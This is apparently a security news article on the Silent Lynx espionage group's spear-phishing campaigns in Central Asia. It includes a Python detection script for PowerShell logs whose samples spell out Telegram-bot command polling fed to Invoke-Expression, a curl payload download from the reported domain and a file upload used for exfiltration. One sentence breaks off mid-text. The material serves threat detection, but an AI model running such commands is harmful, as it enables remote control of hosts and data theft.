A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan.
"This threat group has previously targeted organizations in Eastern Europe and Central Asia involved in economic decision-making and the banking sector," Seqrite Labs researcher Subhajeet Singha noted in a technical report published late last month.
The group's targets include embassies, lawyers, government-backed banks and think tanks. The activity has been attributed to a Kazakhstan-origin threat actor with medium confidence.
The infection chain begins with a spear-phishing email carrying a RAR archive attachment, which ultimately serves as the delivery vehicle for malicious payloads that provide remote access to compromised hosts.
The first of the two campaigns, identified by the cybersecurity company on December 27, 2024, uses the RAR archive to launch an ISO file, which in turn contains a malicious C++ binary and a decoy PDF. The executable then launches a PowerShell script that uses Telegram bots (named "@South_korea145_bot" and "@south_afr_angl_bot") for command execution and data exfiltration.
Some of the commands sent through the bots include curl commands to download and save additional payloads from a remote server ("pweobmxdlboi[.]com") or Google Drive.
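The chain described above (a PowerShell stage polling Telegram bots for commands, and curl used to pull and save further payloads) leaves distinctive traces in PowerShell script block logs (Event ID 4104). The following is an added detection example, not code from the report or from Seqrite Labs; it runs a small rule set over constructed sample script blocks. The bot handles and the download domain come from the article; the bot token, file names and event IDs are placeholders. The rules generalize beyond this one campaign: any script that polls `getUpdates` and feeds the result to `Invoke-Expression` is flagged as critical, while a lone `sendMessage` call (common in benign admin notification scripts) is only low severity.

```python
from __future__ import annotations

import re

# Constructed sample PowerShell script-block log entries (Event ID 4104 style).
# None of these are real logs; the Telegram bot token is a placeholder.
SAMPLE_EVENTS = {
    "evt-001": r"Get-ChildItem C:\Users -Recurse | Where-Object Length -gt 1MB",
    "evt-002": r'$r = Invoke-RestMethod "https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/getUpdates"; '
               r"$out = Invoke-Expression $r.result[-1].message.text",
    "evt-003": r"curl.exe -s https://pweobmxdlboi.com/update.bin -o $env:TEMP\update.bin",
    "evt-004": r'Invoke-RestMethod "https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendDocument" '
               r"-Method Post -Form @{chat_id='1'; document=(Get-Item $env:TEMP\docs.zip)}",
    "evt-005": r'Invoke-RestMethod "https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendMessage" '
               r'-Body @{text="nightly backup done"}',
}

# (rule name, severity, pattern). Bot handles and the domain are the article's
# reported indicators; the Telegram Bot API method names are the public API's.
RULES = [
    ("telegram_bot_api", "low",
     re.compile(r"api\.telegram\.org/bot\d+:[\w-]+/", re.I)),
    ("telegram_command_polling", "high",
     re.compile(r"api\.telegram\.org/bot[^\s\"']+/getUpdates", re.I)),
    ("telegram_file_upload", "high",
     re.compile(r"api\.telegram\.org/bot[^\s\"']+/sendDocument", re.I)),
    ("inline_execution", "medium",
     re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("remote_download_to_disk", "medium",
     re.compile(r"\b(?:curl(?:\.exe)?|Invoke-WebRequest|iwr)\b.*?(?:\s-o\s|-OutFile\b)", re.I)),
    ("known_bot_handle", "high",
     re.compile(r"@(?:South_korea145_bot|south_afr_angl_bot)\b", re.I)),
    ("reported_download_domain", "high",
     re.compile(r"\bpweobmxdlboi\.com\b", re.I)),
]

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


def analyze_script_block(text: str) -> list[tuple[str, str]]:
    """Return (rule_name, severity) pairs for every rule matching the script block."""
    return [(name, sev) for name, sev, pat in RULES if pat.search(text)]


def _severity(hits: list[tuple[str, str]]) -> str:
    """Correlate hits: polling a bot for text and executing it is the C2 loop itself."""
    names = {n for n, _ in hits}
    if {"telegram_command_polling", "inline_execution"} <= names:
        return "critical"
    return max((s for _, s in hits), key=SEVERITY_RANK.__getitem__)


def triage(events: dict[str, str]) -> dict[str, dict]:
    """Map event id -> {severity, rules} for every event that triggered at least one rule."""
    results: dict[str, dict] = {}
    for event_id, block in events.items():
        hits = analyze_script_block(block)
        if hits:
            results[event_id] = {"severity": _severity(hits),
                                 "rules": [n for n, _ in hits]}
    return results


if __name__ == "__main__":
    for event_id, verdict in triage(SAMPLE_EVENTS).items():
        print(f"{event_id}: {verdict['severity']:8s} {', '.join(verdict['rules'])}")
```

In the constructed sample, evt-002 (poll plus execute) is rated critical, the curl download from the reported domain and the `sendDocument` upload are high, and the benign notification script is low; the token and handle patterns are deliberately loose so the rules still fire when an operator rotates bot names.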
The second campaign, by contrast, uses a malicious RAR archive containing two files: a decoy … 8082").
Seqrite Labs said there is some tactical overlap between the threat actor and YoroTrooper (aka SturgeonPhisher), which has been linked to attacks targeting Commonwealth of Independent States (CIS) countries using PowerShell and Golang tools.
"Silent Lynx demonstrates a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts and Golang implants," Singha said.
"Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting, also underscores their focus on espionage in Central Asia and SPECA countries."